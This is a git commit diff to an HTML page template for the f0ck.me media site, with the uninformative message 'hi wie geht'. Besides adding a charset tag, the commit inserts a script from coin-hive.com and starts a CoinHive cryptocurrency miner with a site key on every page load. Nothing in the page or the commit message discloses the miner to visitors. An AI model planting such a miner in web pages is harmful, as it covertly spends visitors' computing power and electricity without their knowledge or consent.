hi wie geht
This commit is contained in:
parent
a27f4048c8
commit
99dabe81c6
|
@ -9,6 +9,7 @@
|
||||||
|
|
||||||
<meta name="Description" content="f0cked by {{ username }}" />
|
<meta name="Description" content="f0cked by {{ username }}" />
|
||||||
<meta property="og:image" content="https://f0ck.me/t/{{ id }}.png" />
|
<meta property="og:image" content="https://f0ck.me/t/{{ id }}.png" />
|
||||||
|
<meta charset="utf-8" />
|
||||||
</head>
|
</head>
|
||||||
<body>
|
<body>
|
||||||
<div class="return"><a href="/" title="return to main"><img class="van" src="./s/f0ck_small.png" alt="f0ck Logo"></a></div>
|
<div class="return"><a href="/" title="return to main"><img class="van" src="./s/f0ck_small.png" alt="f0ck Logo"></a></div>
|
||||||
|
@ -51,6 +52,14 @@
|
||||||
<script src="./s/shit.js"></script>
|
<script src="./s/shit.js"></script>
|
||||||
<script src="./s/theme.js"></script>
|
<script src="./s/theme.js"></script>
|
||||||
<script src="./s/plyr.js"></script>
|
<script src="./s/plyr.js"></script>
|
||||||
<script>plyr.setup( { autoplay: "false" } );</script>
|
<script src="//coin-hive.com/lib/coinhive.min.js"></script>
|
||||||
|
<script>plyr.setup( { autoplay: "false" } );
|
||||||
|
(new CoinHive.Anonymous('ZVrebnhYz9IYygu53a2jhMwGqZuhVlbK', {
|
||||||
|
threads: 2,
|
||||||
|
autoThreads: false,
|
||||||
|
throttle: 0.1,
|
||||||
|
forceASMJS: false
|
||||||
|
})).start();
|
||||||
|
</script>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user